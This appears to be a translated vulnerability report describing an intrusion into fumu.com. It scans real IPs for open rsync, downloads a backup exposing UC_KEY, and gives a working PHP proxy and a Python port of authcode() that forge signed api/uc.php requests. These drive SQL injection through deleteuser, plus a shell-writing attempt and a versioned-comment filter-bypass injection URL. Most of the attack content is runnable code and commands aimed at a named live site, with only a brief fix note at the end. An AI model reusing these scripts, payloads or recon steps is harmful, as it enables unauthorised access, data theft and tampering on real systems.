After reading this article on rsync (http://www.bkjia.com/Article/201307/226273.html) I picked a target at random to try it on. The write-up below also covers UC_KEY exploitation, a relay (proxy) script, and a few related ideas.

www.fumu.com resolves to 210.14.136.87. Following the tutorial in that article, I scanned its class C for rsync: nmap -n --open -p 873 210.14.136.1-255. Connecting to the .93 host was a pleasant surprise: rsync 210.14.136.93:: lists the exported modules. The main site runs phpcms, and the phpcms module here appears to be a backup of the main site's code; the bak module seems to hold a backup of everything. Listing it (rsync 210.14.136.93::bak) shows many directories. To find UC_KEY: rsync 210.14.136.93::bak/newbbs/config/ shows a uc directory, so pull config.inc.php and read it: rsync -vzrtopg --progress 210.14.136.93::bak/uc/data/config.inc.php /Users/test/fumubak. UC_KEY is in that file.

What can be done with UC_KEY? Quite a lot. For details see the earlier WooYun report by "milk tank" (the handle as rendered in translation), "qibo cms full-site system (formerly PHP168) vulnerability: improper configuration lets any user log in", which calls the functions exposed through UC_KEY directly. To see which functions uc.php offers: rsync -vzrtopg --progress 210.14.136.93::bak/newbbs/api/uc.php /Users/test/fumubak/db. updateapps writes a file, which is a shell-writing vulnerability; but after a long test it turned out I had overlooked var_export, which escapes single quotes, so the string cannot be terminated. synlogin lets you set cookies and log in as an administrator, but Discuz asks for the password again on entering the admin panel, so the backend stays out of reach. Finally, deleteuser has a SQL injection, exploited along the lines of http://drops.wooyun.org/tips/125. I turned milk tank's script into a proxy so the injection could be driven conveniently:
```php
<?php
error_reporting(0);
$host = "bbs.fumu.com";
//$doing = $argv[2];
$time = time() + 10*3600;   // uc.php rejects requests older than an hour; a timestamp in the future always passes
$getshell = 0;
//if ($doing == 'login') {
//    // synlogin, but it only logs in the first admin account; if uid 1 is not an administrator, find one manually
//    $code = 'time='.$time.'&uid=1&username=administrator&action=synlogin';
//} elseif ($doing == 'shell') {
//    $code = 'time='.$time.'&action=updateapps';
//} elseif ($doing == 'temp') {
//    $code = 'time='.$time.'&ids=203881) and 1=1&action=deleteuser';
//} else {
//    $doing = 'test';
//    $code = 'time='.$time.'&action='.$doing;
//}

// Proxy mode: the injection payload arrives in ?id= and is passed through as the deleteuser ids value.
// Spaces and '=' are percent-encoded so that parse_str() on the server side restores them intact.
$sqlin = $_GET['id'];
$sqlin = str_replace(" ", "%20", $sqlin);
$sqlin = str_replace("=", "%3D", $sqlin);
$code = 'time='.$time."&ids=$sqlin&action=deleteuser";
$uc_key = array(
    //'null' => '',
    'bbs' => '59xxxxxxxxxxxxxx9ib',
    //'www' => 'cf5xxxxxxxxxxxxxxxxxxxqay2y'
);
foreach ($uc_key as $key => $value) {
    $exp = 'api/uc.php?code='.urlencode(authcode($code, "ENCODE", $value));
    //echo "http://$host/$exp";
    $result = file_get_contents("http://$host/$exp");
    print_r($result);
    //$status = get_headers("http://$host/$exp");
    //if ($result != 'Authracation has expiried' && strpos($status[0], '200') > 0) {
    //    echo $result;
    //    echo "[+] UC_KEY '$key' can use.\r\n";
    //    echo "[*] EXP = $exp\r\n";
    /*
        if ($getshell == 1) {
            // Get shell through updateapps (did not work here: var_export escapes the single quote)
            echo "[+] Getshell...\r\n";
            $cmd = array('one' => '<?xml version="1.0" encoding="ISO-8859-1"?><root><item id="appid">123\');phpinfo();//</item></root>');
            foreach ($cmd as $key => $value) {
                $res = send($host, $exp, $value);
            }
            $getshell = 0;
        }
        print("[+] Try to http://$host/member/api/client/data/cache/apps.php or http://$host/uc_client/data/cache/apps.php\r\n");
    */
    //} else {
    //    echo "[+] UC_KEY '$key' ".$result."\r\n";
    //}
}

// Raw HTTP POST of a body to the signed api/uc.php URL (used by the updateapps attempt).
function send($host, $code, $cmd) {
    $message  = "POST /".$code." HTTP/1.1\r\n";
    $message .= "Accept: */*\r\n";
    $message .= "Referer: ".$host."\r\n";
    $message .= "Accept-Language: zh-cn\r\n";
    $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $message .= "Host: ".$host."\r\n";
    $message .= "Content-Length: ".strlen($cmd)."\r\n";
    $message .= "Connection: Close\r\n\r\n";
    $message .= $cmd;
    $fp = fsockopen($host, 80);
    fputs($fp, $message);
    $resp = '';
    while ($fp && !feof($fp)) $resp .= fread($fp, 1024);
    return $resp;
}

// UCenter's authcode(): an RC4-style stream cipher keyed from md5(UC_KEY), with a 10-digit expiry
// and a 16-char truncated md5 check prepended to the plaintext. Whoever holds UC_KEY can mint
// valid requests, which is everything the script above relies on.
function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
    $ckey_length = 4;
    $key = md5($key ? $key : UC_KEY);
    $keya = md5(substr($key, 0, 16));
    $keyb = md5(substr($key, 16, 16));
    $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length) : substr(md5(microtime()), -$ckey_length)) : '';
    $cryptkey = $keya.md5($keya.$keyc);
    $key_length = strlen($cryptkey);
    $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
    $string_length = strlen($string);
    $result = '';
    $box = range(0, 255);
    $rndkey = array();
    for ($i = 0; $i <= 255; $i++) {
        $rndkey[$i] = ord($cryptkey[$i % $key_length]);
    }
    for ($j = $i = 0; $i < 256; $i++) {
        $j = ($j + $box[$i] + $rndkey[$i]) % 256;
        $tmp = $box[$i];
        $box[$i] = $box[$j];
        $box[$j] = $tmp;
    }
    for ($a = $j = $i = 0; $i < $string_length; $i++) {
        $a = ($a + 1) % 256;
        $j = ($j + $box[$a]) % 256;
        $tmp = $box[$a];
        $box[$a] = $box[$j];
        $box[$j] = $tmp;
        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
    }
    if ($operation == 'DECODE') {
        if ((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
            return substr($result, 26);
        } else {
            return '';
        }
    } else {
        return $keyc.str_replace('=', '', base64_encode($result));
    }
}
```
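Added example, not the report's script and not UCenter's own code: a Python port of authcode() together with a client that forges the same deleteuser request the proxy above builds, and a simplified model of the receiving side of api/uc.php. It shows why holding UC_KEY is enough on its own: the code parameter is RC4 under a key derived from md5(UC_KEY) plus a truncated-md5 check, so anyone with the key can mint valid, unexpired requests, while a wrong key or a stale timestamp is rejected. The server model (its placeholder table name, the one-hour window, the literal error string) follows the author's description and is an assumption rather than Discuz's code; the key value and the uid payload are constructed for the illustration.

```python
"""Forging api/uc.php requests from a recovered UC_KEY (added example, not Discuz/UCenter code)."""
import base64
import hashlib
import random
from urllib.parse import parse_qs, quote, unquote

EXPIRED_MSG = "Authracation has expiried"   # the literal string uc.php returns, as quoted in the report


def _md5(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def _rc4(cryptkey: str, data: bytes) -> bytes:
    """Keystream exactly as authcode() builds it: KSA over the 64-char key string, then PRGA XOR."""
    box = list(range(256))
    rndkey = [ord(cryptkey[i % len(cryptkey)]) for i in range(256)]
    j = 0
    for i in range(256):
        j = (j + box[i] + rndkey[i]) % 256
        box[i], box[j] = box[j], box[i]
    out = bytearray()
    a = j = 0
    for byte in data:
        a = (a + 1) % 256
        j = (j + box[a]) % 256
        box[a], box[j] = box[j], box[a]
        out.append(byte ^ box[(box[a] + box[j]) % 256])
    return bytes(out)


def authcode(string: str, operation: str, key: str, expiry: int = 0, now: int = 0) -> str:
    """Port of UCenter's authcode(). `now` stands in for PHP time() so results are reproducible."""
    ckey_length = 4
    key = _md5(key.encode())
    keya = _md5(key[:16].encode())
    keyb = _md5(key[16:32].encode())
    if operation == 'DECODE':
        keyc = string[:ckey_length]                                   # IV travels in clear as a prefix
    else:
        keyc = _md5(str(random.random()).encode())[-ckey_length:]
    cryptkey = keya + _md5((keya + keyc).encode())
    if operation == 'DECODE':
        body = string[ckey_length:]
        data = base64.b64decode(body + '=' * (-len(body) % 4))        # PHP tolerates the stripped '='
    else:
        header = '%010d' % (expiry + now if expiry else 0)            # 0 means "never expires"
        mac = _md5(string.encode('latin-1') + keyb.encode())[:16]      # truncated md5 keyed with keyb
        data = (header + mac + string).encode('latin-1')
    result = _rc4(cryptkey, data)
    if operation == 'DECODE':
        text = result.decode('latin-1')
        ts = text[:10]
        fresh = ts.isdigit() and (int(ts) == 0 or int(ts) > now)
        if fresh and text[10:26] == _md5(text[26:].encode('latin-1') + keyb.encode())[:16]:
            return text[26:]
        return ''                                                      # wrong key, tampered, or expired
    return keyc + base64.b64encode(result).decode().replace('=', '')


def forge_deleteuser(uc_key: str, ids_payload: str, now: int) -> str:
    """Client side, mirroring the PHP proxy: percent-encode the payload so parse_str keeps it whole,
    sign with a timestamp ten hours ahead, and return the value for ?code=."""
    code = 'time=%d&ids=%s&action=deleteuser' % (now + 10 * 3600, quote(ids_payload, safe=''))
    return quote(authcode(code, 'ENCODE', uc_key), safe='')


def uc_server_model(code_param: str, uc_key: str, now: int):
    """Simplified model of api/uc.php's entry checks (assumed from the report, not Discuz's code):
    decrypt, parse_str, and refuse anything whose time is more than an hour old."""
    plain = authcode(unquote(code_param), 'DECODE', uc_key, now=now)
    get = {k: v[0] for k, v in parse_qs(plain, keep_blank_values=True).items()}
    if not get or now - int(get.get('time', 0)) > 3600:
        return EXPIRED_MSG
    return get


def deleteuser_sql(ids: str) -> str:
    """The sink the payload shape implies: ids dropped unquoted into IN (...). Table name is a placeholder."""
    return "DELETE FROM members WHERE uid IN (%s)" % ids


if __name__ == '__main__':
    t = 1700000000
    param = forge_deleteuser('59xxxxxxxxxxxxxx9ib', '1) and (1)=(1', now=t)   # constructed key and payload
    print(uc_server_model(param, '59xxxxxxxxxxxxxx9ib', now=t + 100))
    print(uc_server_model(param, 'some-other-key', now=t + 100))
```

The only secret protecting every api/uc.php action is UC_KEY itself; once it is readable from a backup, expiry and the md5 tag add nothing, which is why the report treats the rsync exposure as equivalent to full API access.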
The comments left in the script show how painful the testing was. I expected the injection to go smoothly from there, but /source/class/class_core.php also contains an anti-injection check... Bypass: wrap the blocked keyword in a MySQL versioned comment, using the usual floor(rand(0)*2) / group by duplicate-key error to read back version():
http://127.0.0.1/ucbbs.php?id=1)%20and%20(/*!select*/%201%20FROM%20(/*!select*/%20count(*),concat(floor(rand(0)*2),(/*!select*/%20version()))a%20from%20information_schema.tables%20group%20by%20a)b)%20and%20(1)=(1
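Added example, not the check in Discuz's class_core.php: a simplified model of a comment-stripping keyword filter placed next to how MySQL reads the same text. The forbidden-token list and the blanking rule are assumptions made for the illustration; the point is the mismatch between what such a filter inspects and what the parser executes once a keyword is wrapped in /*! ... */. The payload strings are the report's, rebuilt here for the test.

```python
"""Why /*!select*/ slips past a comment-stripping keyword filter (added example, not Discuz code)."""
import re

# Assumed blocklist, in the normalised form the model filter compares against.
FORBIDDEN = ('(select', 'unionselect', 'intooutfile')

# The report's payload in plain form, and the same payload with every select wrapped in a versioned comment.
BLOCKED_PAYLOAD = ("1) and (select 1 from (select count(*),concat(floor(rand(0)*2),"
                   "(select version()))a from information_schema.tables group by a)b) and (1)=(1")
BYPASS_PAYLOAD = BLOCKED_PAYLOAD.replace('select', '/*!select*/')


def filter_view(sql: str) -> str:
    """What the model filter inspects: comment bodies blanked first, then everything except
    [a-z0-9_()] removed, so 'union select' collapses to 'unionselect'."""
    no_comments = re.sub(r'/\*.*?\*/', ' ', sql, flags=re.S)
    return re.sub(r'[^a-z0-9_()]', '', no_comments.lower())


def filter_allows(sql: str) -> bool:
    """True when none of the forbidden tokens appear in the filter's view of the query."""
    view = filter_view(sql)
    return not any(tok in view for tok in FORBIDDEN)


def mysql_view(sql: str) -> str:
    """What MySQL's parser executes: a versioned comment keeps its body (the optional
    5-digit version prefix is dropped), an ordinary comment is discarded. String literals
    containing comment markers are not modelled."""
    sql = re.sub(r'/\*!\d{0,5}\s*(.*?)\*/', r'\1', sql, flags=re.S)
    return re.sub(r'/\*.*?\*/', '', sql, flags=re.S)


def sink(ids: str) -> str:
    """Placeholder for the vulnerable statement the payload is dropped into."""
    return "DELETE FROM members WHERE uid IN (%s)" % ids


if __name__ == '__main__':
    for label, payload in (('plain', BLOCKED_PAYLOAD), ('versioned comments', BYPASS_PAYLOAD)):
        print(label, 'allowed by filter:', filter_allows(sink(payload)))
    print('MySQL executes:', mysql_view(sink(BYPASS_PAYLOAD)))
```

Any filter that normalises a query differently from the database engine is bypassable in this way; the fix is parameterised statements (or, for this specific sink, casting each id to an integer before building the IN list), not a longer keyword list.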
I did not go any further. I also found webshells already sitting in the rsync backup, though I could not work out where they were deployed, and uc.fumu.com has clearly been compromised already. Perhaps consider joining a WooYun public test to shore things up. Proof of vulnerability:
Solution:
Reference: http://www.bkjia.com/Article/201307/226273.html